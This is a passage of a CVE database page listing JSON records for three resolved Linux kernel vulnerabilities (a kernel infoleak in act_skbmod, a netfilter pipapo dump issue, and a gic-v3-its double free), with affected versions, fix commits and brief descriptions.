              "lessThan": "f356eb2fb567e0931143ac1769ac802d3b3e2077",
              "status": "affected",
              "version": "86da71b57383d40993cb90baafb3735cffe5d800",
              "versionType": "git"
            },
            {
              "lessThan": "5e45dc4408857305f4685abfd7a528a1e58b51b5",
              "status": "affected",
              "version": "86da71b57383d40993cb90baafb3735cffe5d800",
              "versionType": "git"
            },
            {
              "lessThan": "a097fc199ab5f4b5392c5144034c0d2148b55a14",
              "status": "affected",
              "version": "86da71b57383d40993cb90baafb3735cffe5d800",
              "versionType": "git"
            },
            {
              "lessThan": "55d3fe7b2b7bc354e7cbc1f7b8f98a29ccd5a366",
              "status": "affected",
              "version": "86da71b57383d40993cb90baafb3735cffe5d800",
              "versionType": "git"
            },
            {
              "lessThan": "729ad2ac2a2cdc9f4a4bdfd40bfd276e6bc33924",
              "status": "affected",
              "version": "86da71b57383d40993cb90baafb3735cffe5d800",
              "versionType": "git"
            },
            {
              "lessThan": "7bb2c7103d8c13b06a57bf997b8cdbe93cd7283c",
              "status": "affected",
              "version": "86da71b57383d40993cb90baafb3735cffe5d800",
              "versionType": "git"
            },
            {
              "lessThan": "d313eb8b77557a6d5855f42d2234bd592c7b50dd",
              "status": "affected",
              "version": "86da71b57383d40993cb90baafb3735cffe5d800",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/sched/act_skbmod.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.9"
            },
            {
              "lessThan": "4.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.85",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.85",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: act_skbmod: prevent kernel-infoleak\n\nsyzbot found that tcf_skbmod_dump() was copying four bytes\nfrom kernel stack to user space [1].\n\nThe issue here is that \u0027struct tc_skbmod\u0027 has a four bytes hole.\n\nWe need to clear the structure before filling fields.\n\n[1]\nBUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:114 [inline]\n BUG: KMSAN: kernel-infoleak in copy_to_user_iter lib/iov_iter.c:24 [inline]\n BUG: KMSAN: kernel-infoleak in iterate_ubuf include/linux/iov_iter.h:29 [inline]\n BUG: KMSAN: kernel-infoleak in iterate_and_advance2 include/linux/iov_iter.h:245 [inline]\n BUG: KMSAN: kernel-infoleak in iterate_and_advance include/linux/iov_iter.h:271 [inline]\n BUG: KMSAN: kernel-infoleak in _copy_to_iter+0x366/0x2520 lib/iov_iter.c:185\n  instrument_copy_to_user include/linux/instrumented.h:114 [inline]\n  copy_to_user_iter lib/iov_iter.c:24 [inline]\n  iterate_ubuf include/linux/iov_iter.h:29 [inline]\n  iterate_and_advance2 include/linux/iov_iter.h:245 [inline]\n  iterate_and_advance include/linux/iov_iter.h:271 [inline]\n  _copy_to_iter+0x366/0x2520 lib/iov_iter.c:185\n  copy_to_iter include/linux/uio.h:196 [inline]\n  simple_copy_to_iter net/core/datagram.c:532 [inline]\n  __skb_datagram_iter+0x185/0x1000 net/core/datagram.c:420\n  skb_copy_datagram_iter+0x5c/0x200 net/core/datagram.c:546\n  skb_copy_datagram_msg include/linux/skbuff.h:4050 [inline]\n  netlink_recvmsg+0x432/0x1610 net/netlink/af_netlink.c:1962\n  sock_recvmsg_nosec net/socket.c:1046 [inline]\n  sock_recvmsg+0x2c4/0x340 net/socket.c:1068\n  __sys_recvfrom+0x35a/0x5f0 net/socket.c:2242\n  __do_sys_recvfrom net/socket.c:2260 [inline]\n  __se_sys_recvfrom net/socket.c:2256 [inline]\n  __x64_sys_recvfrom+0x126/0x1d0 net/socket.c:2256\n do_syscall_64+0xd5/0x1f0\n entry_SYSCALL_64_after_hwframe+0x6d/0x75\n\nUninit was stored to memory at:\n  pskb_expand_head+0x30f/0x19d0 net/core/skbuff.c:2253\n  netlink_trim+0x2c2/0x330 net/netlink/af_netlink.c:1317\n  netlink_unicast+0x9f/0x1260 net/netlink/af_netlink.c:1351\n  nlmsg_unicast include/net/netlink.h:1144 [inline]\n  nlmsg_notify+0x21d/0x2f0 net/netlink/af_netlink.c:2610\n  rtnetlink_send+0x73/0x90 net/core/rtnetlink.c:741\n  rtnetlink_maybe_send include/linux/rtnetlink.h:17 [inline]\n  tcf_add_notify net/sched/act_api.c:2048 [inline]\n  tcf_action_add net/sched/act_api.c:2071 [inline]\n  tc_ctl_action+0x146e/0x19d0 net/sched/act_api.c:2119\n  rtnetlink_rcv_msg+0x1737/0x1900 net/core/rtnetlink.c:6595\n  netlink_rcv_skb+0x375/0x650 net/netlink/af_netlink.c:2559\n  rtnetlink_rcv+0x34/0x40 net/core/rtnetlink.c:6613\n  netlink_unicast_kernel net/netlink/af_netlink.c:1335 [inline]\n  netlink_unicast+0xf4c/0x1260 net/netlink/af_netlink.c:1361\n  netlink_sendmsg+0x10df/0x11f0 net/netlink/af_netlink.c:1905\n  sock_sendmsg_nosec net/socket.c:730 [inline]\n  __sock_sendmsg+0x30f/0x380 net/socket.c:745\n  ____sys_sendmsg+0x877/0xb60 net/socket.c:2584\n  ___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638\n  __sys_sendmsg net/socket.c:2667 [inline]\n  __do_sys_sendmsg net/socket.c:2676 [inline]\n  __se_sys_sendmsg net/socket.c:2674 [inline]\n  __x64_sys_sendmsg+0x307/0x4a0 net/socket.c:2674\n do_syscall_64+0xd5/0x1f0\n entry_SYSCALL_64_after_hwframe+0x6d/0x75\n\nUninit was stored to memory at:\n  __nla_put lib/nlattr.c:1041 [inline]\n  nla_put+0x1c6/0x230 lib/nlattr.c:1099\n  tcf_skbmod_dump+0x23f/0xc20 net/sched/act_skbmod.c:256\n  tcf_action_dump_old net/sched/act_api.c:1191 [inline]\n  tcf_action_dump_1+0x85e/0x970 net/sched/act_api.c:1227\n  tcf_action_dump+0x1fd/0x460 net/sched/act_api.c:1251\n  tca_get_fill+0x519/0x7a0 net/sched/act_api.c:1628\n  tcf_add_notify_msg net/sched/act_api.c:2023 [inline]\n  tcf_add_notify net/sched/act_api.c:2042 [inline]\n  tcf_action_add net/sched/act_api.c:2071 [inline]\n  tc_ctl_action+0x1365/0x19d0 net/sched/act_api.c:2119\n  rtnetlink_rcv_msg+0x1737/0x1900 net/core/rtnetlink.c:6595\n  netlink_rcv_skb+0x375/0x650 net/netlink/af_netli\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:07:46.833Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f190a4aa03cbd518bd9c62a66e1233984f5fd2ec"
        },
        {
          "url": "https://git.kernel.org/stable/c/f356eb2fb567e0931143ac1769ac802d3b3e2077"
        },
        {
          "url": "https://git.kernel.org/stable/c/5e45dc4408857305f4685abfd7a528a1e58b51b5"
        },
        {
          "url": "https://git.kernel.org/stable/c/a097fc199ab5f4b5392c5144034c0d2148b55a14"
        },
        {
          "url": "https://git.kernel.org/stable/c/55d3fe7b2b7bc354e7cbc1f7b8f98a29ccd5a366"
        },
        {
          "url": "https://git.kernel.org/stable/c/729ad2ac2a2cdc9f4a4bdfd40bfd276e6bc33924"
        },
        {
          "url": "https://git.kernel.org/stable/c/7bb2c7103d8c13b06a57bf997b8cdbe93cd7283c"
        },
        {
          "url": "https://git.kernel.org/stable/c/d313eb8b77557a6d5855f42d2234bd592c7b50dd"
        }
      ],
      "title": "net/sched: act_skbmod: prevent kernel-infoleak",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35893",
    "datePublished": "2024-05-19T08:34:48.737Z",
    "dateReserved": "2024-05-17T13:50:33.113Z",
    "dateUpdated": "2025-05-04T09:07:46.833Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-27017 (GCVE-0-2024-27017)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:30 – Updated: 2025-11-04 17:17

Title

netfilter: nft_set_pipapo: walk over current view on netlink dump

Summary

In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_set_pipapo: walk over current view on netlink dump The generation mask can be updated while netlink dump is in progress. The pipapo set backend walk iterator cannot rely on it to infer what view of the datastructure is to be used. Add notation to specify if user wants to read/update the set. Based on patch from Florian Westphal.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/ff89db14c63a82706…
	https://git.kernel.org/stable/c/ce9fef54c5ec9912a…
	https://git.kernel.org/stable/c/52735a010f37580b3…
	https://git.kernel.org/stable/c/f24d8abc2bb8cbf31…
	https://git.kernel.org/stable/c/721715655c7264056…
	https://git.kernel.org/stable/c/29b359cf6d95fd607…

Impacted products

Vendor

Product

Version

Linux

Affected: 2a90da8e0dd50f42e577988f4219f4f4cd3616b7 , < ff89db14c63a827066446460e39226c0688ef786 (git)
Affected: 45eb6944d0f55102229115de040ef3a48841434a , < ce9fef54c5ec9912a0c9a47bac3195cc41b14679 (git)
Affected: 0d836f917520300a8725a5dbdad4406438d0cead , < 52735a010f37580b3a569a996f878fdd87425650 (git)
Affected: 2b84e215f87443c74ac0aa7f76bb172d43a87033 , < f24d8abc2bb8cbf31ec713336e402eafa8f42f60 (git)
Affected: 2b84e215f87443c74ac0aa7f76bb172d43a87033 , < 721715655c72640567e8742567520c99801148ed (git)
Affected: 2b84e215f87443c74ac0aa7f76bb172d43a87033 , < 29b359cf6d95fd60730533f7f10464e95bd17c73 (git)
Affected: f661383b5f1aaac3fe121b91e04332944bc90193 (git)

Linux

Affected: 6.4
Unaffected: 0 , < 6.4 (semver)
Unaffected: 5.10.227 , ≤ 5.10.* (semver)
Unaffected: 5.15.168 , ≤ 5.15.* (semver)
Unaffected: 6.1.112 , ≤ 6.1.* (semver)
Unaffected: 6.6.53 , ≤ 6.6.* (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27017",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-28T16:20:37.656440Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:47:29.908Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:17:24.217Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/721715655c72640567e8742567520c99801148ed"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/29b359cf6d95fd60730533f7f10464e95bd17c73"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/03/msg00002.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "include/net/netfilter/nf_tables.h",
            "net/netfilter/nf_tables_api.c",
            "net/netfilter/nft_set_pipapo.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "ff89db14c63a827066446460e39226c0688ef786",
              "status": "affected",
              "version": "2a90da8e0dd50f42e577988f4219f4f4cd3616b7",
              "versionType": "git"
            },
            {
              "lessThan": "ce9fef54c5ec9912a0c9a47bac3195cc41b14679",
              "status": "affected",
              "version": "45eb6944d0f55102229115de040ef3a48841434a",
              "versionType": "git"
            },
            {
              "lessThan": "52735a010f37580b3a569a996f878fdd87425650",
              "status": "affected",
              "version": "0d836f917520300a8725a5dbdad4406438d0cead",
              "versionType": "git"
            },
            {
              "lessThan": "f24d8abc2bb8cbf31ec713336e402eafa8f42f60",
              "status": "affected",
              "version": "2b84e215f87443c74ac0aa7f76bb172d43a87033",
              "versionType": "git"
            },
            {
              "lessThan": "721715655c72640567e8742567520c99801148ed",
              "status": "affected",
              "version": "2b84e215f87443c74ac0aa7f76bb172d43a87033",
              "versionType": "git"
            },
            {
              "lessThan": "29b359cf6d95fd60730533f7f10464e95bd17c73",
              "status": "affected",
              "version": "2b84e215f87443c74ac0aa7f76bb172d43a87033",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "f661383b5f1aaac3fe121b91e04332944bc90193",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "include/net/netfilter/nf_tables.h",
            "net/netfilter/nf_tables_api.c",
            "net/netfilter/nft_set_pipapo.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.4"
            },
            {
              "lessThan": "6.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.227",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.168",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.112",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.53",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.227",
                  "versionStartIncluding": "5.10.186",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.168",
                  "versionStartIncluding": "5.15.119",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.112",
                  "versionStartIncluding": "6.1.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.53",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.3.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_set_pipapo: walk over current view on netlink dump\n\nThe generation mask can be updated while netlink dump is in progress.\nThe pipapo set backend walk iterator cannot rely on it to infer what\nview of the datastructure is to be used. Add notation to specify if user\nwants to read/update the set.\n\nBased on patch from Florian Westphal."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:55:22.853Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/ff89db14c63a827066446460e39226c0688ef786"
        },
        {
          "url": "https://git.kernel.org/stable/c/ce9fef54c5ec9912a0c9a47bac3195cc41b14679"
        },
        {
          "url": "https://git.kernel.org/stable/c/52735a010f37580b3a569a996f878fdd87425650"
        },
        {
          "url": "https://git.kernel.org/stable/c/f24d8abc2bb8cbf31ec713336e402eafa8f42f60"
        },
        {
          "url": "https://git.kernel.org/stable/c/721715655c72640567e8742567520c99801148ed"
        },
        {
          "url": "https://git.kernel.org/stable/c/29b359cf6d95fd60730533f7f10464e95bd17c73"
        }
      ],
      "title": "netfilter: nft_set_pipapo: walk over current view on netlink dump",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27017",
    "datePublished": "2024-05-01T05:30:01.888Z",
    "dateReserved": "2024-02-19T14:20:24.209Z",
    "dateUpdated": "2025-11-04T17:17:24.217Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35847 (GCVE-0-2024-35847)

Vulnerability from cvelistv5 – Published: 2024-05-17 14:47 – Updated: 2025-05-04 09:06

Title

irqchip/gic-v3-its: Prevent double free on error

Summary

In the Linux kernel, the following vulnerability has been resolved: irqchip/gic-v3-its: Prevent double free on error The error handling path in its_vpe_irq_domain_alloc() causes a double free when its_vpe_init() fails after successfully allocating at least one interrupt. This happens because its_vpe_irq_domain_free() frees the interrupts along with the area bitmap and the vprop_page and its_vpe_irq_domain_alloc() subsequently frees the area bitmap and the vprop_page again. Fix this by unconditionally invoking its_vpe_irq_domain_free() which handles all cases correctly and by removing the bitmap/vprop_page freeing from its_vpe_irq_domain_alloc(). [ tglx: Massaged change log ]

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f5417ff561b8ac9a7…
	https://git.kernel.org/stable/c/b72d2b1448b682844…
	https://git.kernel.org/stable/c/aa44d21574751a7d6…
	https://git.kernel.org/stable/c/5dbdbe1133911ca7d…
	https://git.kernel.org/stable/c/dd681710ab77c8bea…
	https://git.kernel.org/stable/c/03170e657f62c2683…
	https://git.kernel.org/stable/c/5b012f77abde89bf0…
	https://git.kernel.org/stable/c/c26591afd33adce29…

Impacted products

Vendor

Product

Version

Linux

Affected: 7d75bbb4bc1ad90386776459d37e4ddfe605671e , < f5417ff561b8ac9a7e53c747b8627a7ab58378ae (git)
Affected: 7d75bbb4bc1ad90386776459d37e4ddfe605671e , < b72d2b1448b682844f995e660b77f2a1fabc1662 (git)
Affected: 7d75bbb4bc1ad90386776459d37e4ddfe605671e , < aa44d21574751a7d6bca892eb8e0e9ac68372e52 (git)
Affected: 7d75bbb4bc1ad90386776459d37e4ddfe605671e , < 5dbdbe1133911ca7d8466bb86885adec32ad9438 (git)
Affected: 7d75bbb4bc1ad90386776459d37e4ddfe605671e , < dd681710ab77c8beafe2e263064cb1bd0e2d6ca9 (git)
Affected: 7d75bbb4bc1ad90386776459d37e4ddfe605671e , < 03170e657f62c26834172742492a8cb8077ef792 (git)
Affected: 7d75bbb4bc1ad90386776459d37e4ddfe605671e , < 5b012f77abde89bf0be8a0547636184fea618137 (git)
Affected: 7d75bbb4bc1ad90386776459d37e4ddfe605671e , < c26591afd33adce296c022e3480dea4282b7ef91 (git)

Linux

Affected: 4.14
Unaffected: 0 , < 4.14 (semver)
Unaffected: 4.19.313 , ≤ 4.19.* (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.158 , ≤ 5.15.* (semver)
Unaffected: 6.1.90 , ≤ 6.1.* (semver)
Unaffected: 6.6.30 , ≤ 6.6.* (semver)
Unaffected: 6.8.9 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35847",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-12T15:13:12.628141Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-12T15:13:20.451Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.906Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f5417ff561b8ac9a7e53c747b8627a7ab58378ae"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b72d2b1448b682844f995e660b77f2a1fabc1662"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/aa44d21574751a7d6bca892eb8e0e9ac68372e52"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5dbdbe1133911ca7d8466bb86885adec32ad9438"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dd681710ab77c8beafe2e263064cb1bd0e2d6ca9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/03170e657f62c26834172742492a8cb8077ef792"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5b012f77abde89bf0be8a0547636184fea618137"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c26591afd33adce296c022e3480dea4282b7ef91"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/irqchip/irq-gic-v3-its.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f5417ff561b8ac9a7e53c747b8627a7ab58378ae",
              "status": "affected",
              "version": "7d75bbb4bc1ad90386776459d37e4ddfe605671e",
              "versionType": "git"
            },
            {
              "lessThan": "b72d2b1448b682844f995e660b77f2a1fabc1662",
              "status": "affected",
              "version": "7d75bbb4bc1ad90386776459d37e4ddfe605671e",
              "versionType": "git"
            },
            {
              "lessThan": "aa44d21574751a7d6bca892eb8e0e9ac68372e52",
              "status": "affected",
              "version": "7d75bbb4bc1ad90386776459d37e4ddfe605671e",
              "versionType": "git"
            },
            {
              "lessThan": "5dbdbe1133911ca7d8466bb86885adec32ad9438",
              "status": "affected",
              "version": "7d75bbb4bc1ad90386776459d37e4ddfe605671e",
              "versionType": "git"
            },
            {
              "lessThan": "dd681710ab77c8beafe2e263064cb1bd0e2d6ca9",
              "status": "affected",
              "version": "7d75bbb4bc1ad90386776459d37e4ddfe605671e",
              "versionType": "git"
            },
            {
              "lessThan": "03170e657f62c26834172742492a8cb8077ef792",
              "status": "affected",
              "version": "7d75bbb4bc1ad90386776459d37e4ddfe605671e",
              "versionType": "git"
            },
            {
              "lessThan": "5b012f77abde89bf0be8a0547636184fea618137",
              "status": "affected",
              "version": "7d75bbb4bc1ad90386776459d37e4ddfe605671e",
              "versionType": "git"
            },
            {
              "lessThan": "c26591afd33adce296c022e3480dea4282b7ef91",
              "status": "affected",
              "version": "7d75bbb4bc1ad90386776459d37e4ddfe605671e",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/irqchip/irq-gic-v3-its.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.14"
            },
            {
              "lessThan": "4.14",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.313",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.158",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.30",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.313",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
